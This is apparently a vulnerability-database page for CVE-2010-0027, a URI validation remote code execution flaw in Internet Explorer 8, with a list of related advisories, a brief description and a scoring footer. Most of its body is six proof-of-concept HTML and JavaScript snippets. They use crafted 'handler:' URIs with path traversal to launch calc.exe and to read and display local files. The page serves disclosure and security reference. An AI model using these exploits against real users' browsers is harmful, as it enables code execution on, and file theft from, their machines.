Microsoft Internet Explorer 8 - URI Validation Remote Code Execution
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| CVE-2010-0027 | 21 Jan 201000:00 | – | circl | |
| Microsoft Windows Shell Handler URL Validation Code Execution (MS10-007; CVE-2010-0027) | 9 Feb 201000:00 | – | checkpoint_advisories | |
| CVE-2010-0027 | 22 Jan 201021:20 | – | cve | |
| CVE-2010-0027 | 22 Jan 201021:20 | – | cvelist | |
| MS10-002: Cumulative security update for Internet Explorer | 23 Jun 201407:27 | – | mskb | |
| CVE-2010-0027 | 22 Jan 201022:00 | – | nvd | |
| Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) | 10 Feb 201000:00 | – | openvas | |
| Microsoft Internet Explorer Multiple Vulnerabilities (978207) | 22 Jan 201000:00 | – | openvas | |
| Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) | 10 Feb 201000:00 | – | openvas | |
| Microsoft Internet Explorer Multiple Vulnerabilities (978207) | 22 Jan 201000:00 | – | openvas |
10
source: https://www.securityfocus.com/bid/37884/info
Microsoft Internet Explorer is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer.
NOTE: Reports indicate that the issue can also be exploited via other applications that use the 'ShellExecute()' API.
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe">
</html>
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt">
</html>
############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);
content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
</body>
</html>
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(’GET’,
‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,
true);
req.send(”);
############### PoC six #############
<html><body><div>
<script>
function getHTTPObject()
{
if (typeof XMLHttpRequest != 'undefined')
{
return new XMLHttpRequest();
}
try {
return new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e)
{
try
{
return new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);
</script>
</div></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.33985